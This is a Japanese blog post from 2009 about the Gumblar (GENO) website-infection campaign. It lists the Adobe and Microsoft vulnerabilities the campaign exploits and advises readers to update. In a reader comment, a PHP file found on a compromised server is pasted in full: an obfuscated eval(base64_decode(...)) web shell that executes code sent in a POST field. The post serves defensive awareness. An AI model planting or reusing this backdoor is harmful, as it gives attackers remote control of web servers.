|
2009年10月になって戻ってきた「Gumblar」「JSRedir-R」(GENOウイルス)の攻撃者。今回、ユーザーの意思関係なくウイルス本体を発動させるため、攻撃者が用意したソフトウェアの脆弱性を突く処理をピックアップ。 ちなみに、前回の5月の騒動では、PDF閲覧ソフト「Adobe Reader」と動画再生アドオン「Adobe Flash Player」の旧バージョンにある脆弱性を悪用してました。あと、サイトに挿入される難読化されたJavaScriptコードには、なぜかターゲットとなるWindowsの種類やブラウザを振り分ける処理が含まれてました。 今回はブラウザの絞りはないようで、基本的にWindowsユーザーがターゲットになってます。そして、タイミング(?)により読み込まれる不正なデータが異なりますが、いちばん処理が多いもの(上画像)を紹介しておきます。 ・Adobe Reader の脆弱性 ・Adobe Flash Player の脆弱性 ・Microsoft Office Web コンポーネント の脆弱性 (MS09-043) ・Internet Explorer 7 の脆弱性 (MS09-002) Adobe系ソフトウェア2つの最新版への更新と、Windows Update(Microsoft Update)がちゃんと行われていれば、改ざん被害を受けてしまったページをブラウザで単に見ただけでウイルスが発動してしまう状況は回避できます。 ☆ Gumblar(GENOウイルス)の最新情報はコチラ! (20日追記...) ScanSafeに続くセキュリティ会社のアラート。IBM Internet Security Systemsってとこのブログにて「Gumblar Reloaded」という19日付の記事を掲載。 |
>
- コンピュータとインターネット
>
- インターネット
>
- その他インターネット
Gumblaerが悪用する脆弱性を特定するにあたり、掲載しているコードを最低限のみ引用させていただきました。以下がそのまとめです。ご参考になれば嬉しいです。
http://d.hatena.ne.jp/kaito834/20091025/1256437910
[ kaito834 ]
2009/10/25(日) 午前 11:47
手元のサーバーの html, php, jsファイルは改ざんされてい
ました。
flash(swf),PDFファイルも改ざんされる可能性があるという
ことでしょうか。
2009/10/26(月) 午後 10:23
swf、pdf自体は別にいじられないです。
[ noooo_spam ]
2009/10/27(火) 午後 10:12
ありがとうございます。安心しました。
今回のウイルスのせいなのかわかりませんが、
ランダムなファイル名のテキストファイルが
6つ生成されているフォルダがみつかりました。
そこには、phpファイル2つも生成されていました。
phpのほうの中身は、
<?php eval(base64_decode("aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7"));?>
だけでした。
2009/10/27(火) 午後 11:02